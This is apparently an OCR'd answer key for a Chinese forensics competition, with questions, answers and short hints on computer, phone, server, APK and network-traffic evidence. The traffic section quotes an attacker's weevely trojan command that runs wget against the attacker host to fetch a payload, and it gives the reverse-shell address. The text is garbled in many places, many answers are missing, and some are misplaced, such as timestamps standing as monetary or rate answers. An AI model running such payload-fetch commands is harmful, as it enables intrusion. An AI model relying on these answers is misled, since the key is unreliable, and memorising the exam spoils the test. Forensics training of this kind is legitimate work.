计算机取证

请根据计算机检材，回答以下问题：(32个小题，共76分

1.[填空题对计算机镜像进行分析，计算该镜像中ESP分区的SM3值后8位为？（答案格式：大写字母与数字组合，如：D23DDF44)(2分)

BDBE1073

2.填空题]对计算机镜像进行分析，该操作系统超管账户最后一次注销时间为？（时区为UTC+08:00)(答案格式如：1970-01-0100:00:00)(2分)

2024-10-25 22:57:32

3.[填空题对计算机镜像进行分析，该操作系统超管账户有记录的登录次数为？（填写数字，答案格式如1234）(2分)

24

4.[填空题]对计算机镜像进行分析，该操作系统设置的账户密码最长存留期为多少天？（填写数字，答案格式如：1234）(2分

42

5.填空题]对计算机镜像进行分析，该操作系统安装的数据擦除软件的版本为？（答案格式：1.23）(2分

5.86

6.[填空题对计算机镜像进行分析，该操作系统接入过一名称为"ReltekUSBDiskautorunUSBDevice”的USB设备，其入时分配的盘符为？（答案格式：A)(2分）

E

7.[填空题]对计算机镜像进行分析，该操作系统无线网卡分配的默认网关地址为？（答案格式：127.0.0.1）2分)》

192.168.43.104

8.[填空题对计算机镜像进行分析，该操作系统配置的连接NAS共享文件夹的1P地址为？（答案格式：127.0.0.1）(2分)

192.168.188.1

9.[填空题]对计算机镜像进行分析，写出"吵群技巧txt”文件SM3值的后8位？（大写字母与数字组合，如：D23DDF44)(2分）

10887AE1

10.[填空题]对计算机镜像进行分析，该操作系统通过SSH连接工具连接CCTak测试环境的SSH端口为？（填写数字，答案格式如：1234)(2分)

12849

11.[填空题]对计算机镜像进行分析，该操作系统通过SSH连接工具连接的CCTalki境外服务器是哪个运营商的？（填写汉字，答案格式：阿里云)(2分)

亚马逊云

12.[填空题]对计算机镜像进行分析，获取机主在本机的U盾序号的后4位数字为？（填写数字，答案格式如：1234）(2分)

6409

图片隐写

13.[填空题]对计算机镜像进行分析，机主存储的某篇新闻报道“小程序搅动资源争夺战”的发表年份为？（答案格式：2024）(2分)

2019

找到文件在线转格式查看

14.[填空题对计算机镜像进行分析，该操作系统访问“环球商贸”的1P地址为？（答案格式：127.0.0.1）(2分)

39.108.126.128

15.[填空题]对计算机镜像进行分析，“环球商贸”服务器配置的登泉密码为？（答案按照实际填写，字母存在大小写）(2分)

HQSM#20231108@gwWeB

得到的密码需要解密

查看FinalShell已保存密码 | 在线工具 - 查看FinalShell密码 免费

如何获取Finalshell中保存的密码_finalshell密码查看-CSDN博客

16.[填空题对计算机镜像进行分析，机主安装的PC-Server服务环境的登录密码是？（答案按照实际填写，字母全小写）(2分)

jlb654321

17.[填空题对计算机镜像进行分析，机主搭建的宝塔面板的安全入口为？（答案格式：/abc123)(2分）

/c38b336a

18.[填空题]对计算机镜像进行分析，机主搭建的宝塔面板的登录账号为？（答案格式：abcd)(2分）

igmxcdsa

19.[填空题]对计算机镜像进行分析，其搭建的宝塔面板的登泉密码为？（按实际值填写）(2分)

加盐：93c35e3af4cfe9a3d19de72d4dce3337

20.[填空题]对计算机镜像进行分析，机主搭建的宝塔环境中绑定的宝塔账号是？（按实际值填写）(4分)

17859628390

21.[填空题]对计算机镜像进行分析，机主搭建的宝塔面板中小ysql环境的root密码为？（按实际值填写）(4分)

123456

22.[填空题]对计算机镜像进行分析，机主搭建的宝塔面板中Mysq环境连接的端口号为？（填写数字，答案格式如：1234）(2分)

3306

23.[填空题接上题，”卡号分组”表所在的数据库名为？（答案按照实际填写，字母全小写)(4分)

a_train2023

24.[填空题接上题，"孙华锦”在2020-07-0110：49：07时间节点的交易余额为？（答案格式：1234.56）(4分)

6610.94

找到对应数据库导出表格查看

25.[填空题对U盘镜像进行分析，其镜像中共有几个分区？（填写数字，答案格式如：1234)(2分)

2

26.[填空题]对U盘镜像进行分析，其中FAT32主分区的FAT表数量有几个？（请使用十进制数方式填写答案，答案格式：1234）(2分)

27.[填空题]对U盘镜像进行分析，其中FAT32主分区定义的每扇区字节数为？（请使用十进制数方式填写答案，答案格式：1234）(2分)

512

28.[填空题对U盘镜像进行分析，其中FAT32主分区的文件系统前保留扇区数为？（请使用十进制数方式填写答案，答案格式：1234)(2分)

29.[填空题]对U盘镜像进行分析，其中FAT32主分区的FAT1表相对于整个磁盘的起始扇区数为？（请使用十进制数方式填写答案，答案格式：1234)(2分)

30.[填空题]对U盘镜像进行分析，其中NTFS逻辑分区的$MFT起始簇号为？（请使用十进制数方式填写答案，答案格式：1234）(2分)

31.[填空题对U盘镜像进行分析，其中NTFS逻辑分区的簇大小为多少个扇区？（请使用十进制数方式填写答案，答案格式：1234)(4分)

32.[填空题对盘镜像进行分析，请从该镜像的两个分区中找出使用"新建文本文档txt”记录的同一个MD5值的两部分信息，并写出该MD5值的第13-20位字符串。（答案格式：大写字母与数字组合，如D23DDF44(4分)

手机取证

1.[填空题]对手机镜像进行分析，机主微信D号为？（答案按照实际填写，字母全小写)(2分)

wxid_gvlyzqeyg83o22

2.[填空题对手机镜像进行分析，机主在2023年12月登泉宝塔面板使用的验证码为？（填写数字，答案格式如：1234）(2分)

482762

3.[填空题]对手机镜像进行分析，小众即时通讯“鸽达”应用程序的最后更新时间为？（答案格式如：1970-01-0100：00：00）(2分)

2024-09-20 09:25:19

4.[填空题对手机镜像进行分析，该手机中记录的最后一次开机时间。（答案格式如：1970-01-0100：00：00）(2分)

2024-10-24 11:27:14

5.[填空题]对手机镜像进行分析，该手机中高德地图APP应用的登录D为？（答案按照实际填写）(2分)

950980338

6.对手机镜像进行分析，该手机中高德地图APP应用登泉账号头像的SHA-256值前8位为？（答案格式：大写字母与数字组合，如：D23DDF44)(2分)

EC2E1795

导出头像文件计算哈希值

7.[填空题]对手机镜像进行分析，其中20220207-20230206的微信账单文件的解压密码为？（答案格式：按实际值填写）(2分)

847905

图片中有微信账单记录

8.[填空题对手机镜像进行分析，机主在手机中存储的一张复古士砌矮墙照片的拍摄地为哪个城市？（答案格式：北京市）(2分)

景德镇市

图片中找到，搜索是景德镇

9.[填空题]对手机镜像进行分析，通过A合成的人脸照片中，有几张照片是通过本机当前安装的A照片合成工具生成，并有对应记录的？（填写数字，答案格式如：1234)(4分)

3

找到对应的数据库，数据库中有记录

10.[填空题]对手机镜像进行分析，统计出通讯录号码归属地第二多的省份是？（答案格式：广东）(4分)

福建

统计通讯录的记录第二多的是福建

11.[填空题]对手机镜像进行分析，找出"季令柏”身份证号后4位为？（答案格式：1234）(2分)

8043

找到一张损坏的图片，文件名叫我的身份证信息

导出文件，用010打开发现没有文件头，直接把文件头补全就可以正常显示身份证图片

12.[填空题]对手机镜像进行分析，找出接收"葵花宝典1.doc”文件使用的应用程序的第一次安装时间为？（答案格式如：1970-01-0100:00:00(2分)

2024-09-20 09:29:40

使用电报接收文件

找到应用列表记录

13.[填空题]对手机镜像进行分析，机主使用的小众即时通讯，应用使用的服务器1P为？（答案格式：127.0.0.1）(2分)

163.179.125.64

既可以导出apk逆向解析也可以直接去找数据库的记录

14.[填空题]对手机镜像进行分析，机主在哪个平台上发布过转让传奇游戏币的信息，请写出该平台应用APP的包名？（答案格式：com.abcd)(4分)

com.jiuwu

15.[填空题]对手机镜像进行分析，其中有一“双色球”网页的玩法规侧中定义的"三等奖”的奖金是多少？（填写数字，答案格式如：1234）(4分)

3000

在备忘录中有记录网址

16.「填空题]对手机镜像进行分析，找出手机连接过的米家摄像头终端设备的用户D为？（答案格式：答案按照实际填写）(2分)

2968704175

17.[填空题]对手机镜像进行分析，找出手机连接过的米家摄像头终端设备的IP地址为？（答案格式：127.0.0.1）(4分)

192.168.110.106

数据分析

1.[填空题]对计算机，手机，U盘镜像检材综合分析，找出计算机中VC加密容器使用的登录密钥文件，其中逻辑大小较小的文件占用多少个字节？

1173

在聊天记录的数据库中找到记录密钥的消息

2.[填空题]对计算机，手机，U盘镜像检材综合分析，写出存储的“带彩计划，txt”文件的SM3哈希值前8位；（大写字母与数字组合，如：D23DDF44）（2分)

AF30FFA1

导出加密的容器在本地挂载

3.[填空题]对计算机，手机，U盎镜像检材综合分析，写出存储的“Shakepay买币，提币流程ppt”文件在当前分区的起始簇号；（填写数字，答案格式如：1234)（4分）

4.[填空题]对计算机，手机，U盘镜像检材综合分析，写出存储在手机中，用于访问钱包地址的网站登录密码；（答案按照实际填写，字母全大写）(4分)

5.[填空题]对计算机，手机，U盘镜像检材综合分析，写出存储的钱包地址的前8位；（答案格式：abcd1234）（4分)

6.[填空题]对计算机，手机，U盘镜像检材综合分析，写出存储的钱包地址私钥的前8位；（答案格式：abcd1234）（4分）

7.[填空题]对计算机，手机，U盘镜像检材综合分析，统计出机主微信账单从210207-240206期间发生的转入金额第三高的“对方卡号”字段的值为？（答案格式：汉字）

8.对计算机，手机，U盘镜像检材综合分析，统计出机主微信账单从210207-240206期间发生的“对方卡号”字段值为“陈建设”的转出净值为？案格式如：1234）（2分）

9.[填空题]对计算机，手机，U盘德像检材综合分析，统计出机主微信账单从210207-240206期间发生的交易笔数第三多的数量为？（填写数字，答案格式如：1234）（2分)

10.[填空题]

对数据分析检材中的第01-数据进行分析，办案人员从多个赌博网站中导出了100多份的报表，请统计出所有平台会员使用本币充值的总金额是多少？（答案格

式：仅数字，结果不保留小数)（2分)

11.[填空题]

★

对数据分析检材中的第02-数据进行分析，办案人员在电脑中找到多个赌博网站的交易流水报表，每个报表都是以网站编号和年份命名，每个月独立生成一个

13.[填空题]

对数据分析检材中的第03-数据进行分析，通过还原赌博平台数

据库备份文件，请统计用户投注总次数前5的彩种开奖总次数？（涉

及的数据库表：

ssc2022bets,ssc2022data)(答案格式：123456)(4分)

14.[填空题]

对数据分析检材中的第03-数据进行分析，请统计出在不止一种

彩种上进行过投注的用户数量，并计算他们在2018年一共涉及了

平台多少流水？（答案格式：保

留三位有效数字，如：123.123)(4分)

服务器取证

1.[填空题]

对服务器检材进行分析，站点服务器可能是从哪个云服务平台上调证过来的？（填写汉字，答案格

式：亿速云）（2分)

阿里云

2.[填空题]对服务器检材进行分析，站点服务器中数据库的密码是？（按实际值填写）（2分）

Sxy000**

application.yaml

3.[填空题]

对服务器检材进行分析，站点服务器用于提供服务发现的工具名是？（答案格式：zookeeper)

(4分)

consul

查看历史命令

4.[填空题]

对服务器检材进行分析，站点服务器数据库配置文件名是？（答案格式：database.php）（2分）

application.yaml

5.[填空题]对服务器检材进行分析，该网站涉及的APP名称是？（答案格式：微信）（2分)

顺心借

6.[填空题]

对服务器检材进行分析，该网站用于存储大量身份证照的OSS中的AccessKeyID后八位是？（答案格

式：按实际值填写）（2分)

EuZJybzD

7.[填空题]

对服务器检材进行分析，站点服务器用于消息转发代理工具所使用的端口号是？（填写数字，答案格

式：3306）（2分)

5672

8.[填空题]对服务器检材进行分析，站点服务器用于启动定时任务的代码片段存在于？（答案格式:

Loginlndex.class）(4分)

MobileStatusTask.class

9.[填空题]对服务器检材进行分析，站点服务器用于验证用户输入的验证码是否匹配的代码片段存在于？（答案格式：Loginlndex.class）（4分）

AdminIndexConller.class

10.[填空题]对服务器检材进行分析，数据库服务器中Docker容器镜像中mysql的镜像ID号前6位是？（答案格式：123asd)（2分）

23b013

11.[填空题]对服务器检材进行分析，数据库服务器中DockerCompose的版本号是？（答案格式：1.1.1）（2分）

2.27.1

12.[填空题]对服务器检材进行分析，数据库服务器中用于存储后台登录账号的数据表名是？（答案格式：login)（2分）

sys_prod

13.[填空题]对服务器检材进行分析，后台管理员“xpt-0”所绑定的手机号码是？（答案格式：13001880188）（2分）

19521510863

2024-11-1509:04

14.[填空题]对服务器检材进行分析，用户首次借款初始额度是？（填写数字，答案格式：1）（2分）

5000

15.[填空题]

对服务器检材进行分析，受害者在平台中一共结款了几次？（填写数字，答案格式：1）（2分）

1869

16.[填空题]对服务器检材进行分析，该平台中所有下单用户成功完成订单总金额是？（填写数字，答案格式：1)（2分）

17.[填空题]对服务器检材进行分析，该平台中逾期费率是？（答案格式：1.1）（2分）

2024-11

18.[填空题]对服务器检材进行分析，该平台中累计还款总金额是？（填写数字，答案格式：1)（2分）

2024-11-1509:04

19.[填空题]

对服务器检材进行分析，该平台总共设置了多少种借款额度？（填写数字，答案格式：1）（2分)

20.[填空题]

对服务器检材进行分析，该平台一共有多少个借款渠道？（填写数字，答案格式：1）（2分)

2024-11-1

21.[填空题]

对服务器检材进行分析，该平台对已完成用户收取了总计多少元服务费，结果精确到整数？（填写数字，答案格式：123）（2分）

程序功能分析

请根据exe程序检材，回答以下问题：(8个小题，共20分)

1.[填空题]对exe程序检材进行分析，计算程序的MD5(128bit）校验值的最后八位息？（答案格式：大写宁母与数宁组合，如：D23DDF44）(2分)

3CDD7939

2.[填空题]对exe件序检材进行分析，龙出其释放的可执行科序的路径？（答案格式：D:\Document\Aaaa)(2/>

C:\Program Files\Cloudflare

3.[填空题]对exe程序检材进行分听，我出其启动释放的可执行程序时命令的最后一个参数是什么？（答案恪式：按实际值填写）（2分）

8.8.8.8

5.[填空题]xexe程序检材进行分析，请问Chakra模执的代码段被修改了多少宁节（答案格式：①x1122）（2分）

使用x32dbg.exe程序对Warp.exe进行动态调试分析，点击“文件”-> “打开”,在弹出的窗口中选择“C:\Program Files\Cloudflare\Warp.exe”可执行程序；

6.【填空题]

7.【填空题]

对exe程序检材计行分析，解密出的字节码故起中拱带着PE格式的数账，开旦节区教据被加密，请分析给出所密第一个节区时使用的秘钥（答案格式：0x1B0x220x330x4A）（4分

8. [填空题]对exe程序检材进行分析，这份字节码数掘辉密前的密文第个字节是什么（例灯：Ox1B)（4分）

9.[填空题]分析检材APK中检材-01.apk，块I《其md5（128bit）校验值后八位？（答案格式：人与字母与教字组合，如：D23DDF44)（2分)

CEAEBF87

10.[填空题]分析检材APK中粉材-01.apk，请-iHapp的包名？（然案格式：com.xxx.xXx）（2分）

com.changbo.pro

11. [填空题]接卜题，请给Happ的加固方式；（答察格式：邯掷）（2分)

360

12.[填空题】接上题，请给出app启动时主页面显示的activity名称；（答案格式：com.xxx.xxx.Mainactivity） (2分)

com.changbo.pro.ui.home.MainActivity

13.[填空题]分析检材APK中检材01.apk，请给出加密的访问地址的数据是？（4分）

14. [填空题]分析检材APK中检材-01.apk，请给山解密后的域名为？（答案格式：需要加上端门号，如：http://tieba.com:6666)（4分）

https://posp.ipaynow.cn:10900

15. [填空题】接上题，请给|辉密调用的so的名称；（答案格式：abcamm)（4分)

plugin_phone

16.[填空题]对检材APK中检材-02.apk分析，获取其中的flag；（答案格式：flag{ISEC-C6d-ddd-7gd})(4分)

23柏鹭杯-misc - WXjzc - 博客园

17. [填空题]对检APK中检-03.apk分析，获取其中的fag；（答案格式C：flag{lSEC-C6d-ddd-7gd])(4分)

23柏鹭杯-misc - WXjzc - 博客园

网络流量分析

1.[填空题]分析网络流量包检材，写出抓取该流量包时所花费的秒数？（填写数字，答案格式：10)（2分)

3504

2.[填空题]分析网络流量包检材，抓取该流量包时使用计算机操作系统的build版本是多少？（答案格式：10D32）（2分)

23F79

3.[填空题]分析网络流量包检材，受害者的IP地址是？（答案格式：192.168.1.1)（2分)

192.168.75.131

4.[填空题]分析网络流量包检材，受害者所使用的操作系统是？（小写字母，答案格式：biwu)（2分)

Ubuntu

5.[填空题]分析网络流量包检材，攻击者使用的端口扫描工具是？(小写字母，答案格式：abc)（2分)（答案格式：1.1.1）(2分)

nmap

6.[填空题]分析网络流量包检材，攻击者使用的漏洞检测工具的版本号是？

3.1.0

7.[填空题]分析网络流量包检材，攻击者通过目录扫描得到的phpliteadmin登录点是？（答案格式：/abc/abc.php)（2分)

/dbadmin/test_db.php

8.[填空题]分析网络流量包检材，攻击者成功登录到phpliteadmin时使用的密码是？（答案格式：按实际值填写）（2分)

admin

9.[填空题】分析网络流量包检材，攻击者创建的phpinfo页面文件名是？（答案格式：abc.txt)

（4分)

demo.php

10.[填空题]分析网络流量包检材，攻击者利用服务器漏洞从攻击机上下载的payload文件名是？（答案格式：abc.txt)(4分)

rev.txt

11.[填空题]分析网络流量包检材，攻击者反弹shell的地址及端口是？（答案格式：192.168.1.1:1234)（4分）

192.168.75.132:30127

12.[填空题]分析网络流量包检材，攻击者电脑所使用的Python版本号是？（答案格式：1.1.1）（2分)

3.11.8

13.[填空题]分析网络流量包检材，受害者服务器中网站所使用的框架结构是？（答案格式：thinkphp)（2分）

wordpress

14.[填空题]分析网络流量包检材，攻击者获取到的数据库密码是？（答案格式：大小写按实际值填写）（4分)

sWfCsfJSPV9H3AmQzw8

15.[填空题]分析网络流量包检材，攻击者上传了一个weevely木马进行权限维持，上传时所使用的端口号为？（答案格式:3306）（2分)

2000

16.[填空题]分析网络流量包检材，攻击者上传了一个weevely木马进行权限维持，该木马第一次执行时获取到的缓冲区内容是？（答案格式：按实际值填写）（4分)

wget 192.168.75.132:2000/help.php